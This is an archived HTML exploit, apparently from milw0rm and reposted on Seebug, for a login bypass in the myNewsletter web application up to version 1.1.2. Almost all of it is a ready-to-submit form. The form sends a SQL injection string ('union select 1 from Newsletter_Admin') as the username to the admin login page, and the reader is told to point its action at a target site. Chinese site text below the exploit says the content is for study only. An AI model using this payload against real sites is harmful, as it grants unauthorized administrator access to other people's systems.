<!-- orginal advisory : http://www.kapda.ir/advisory-340.html --> <html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit </center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp"> <input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='"> <input type="hidden" name="Password" value="1"> <center><br><input type="submit" name="Submit" value="Login"></center><br><br> <!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net --> <center><a href="http://www.kapda.ir">www.kapda.ir</a></center> </form> </html> # milw0rm.com [2006-06-06]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论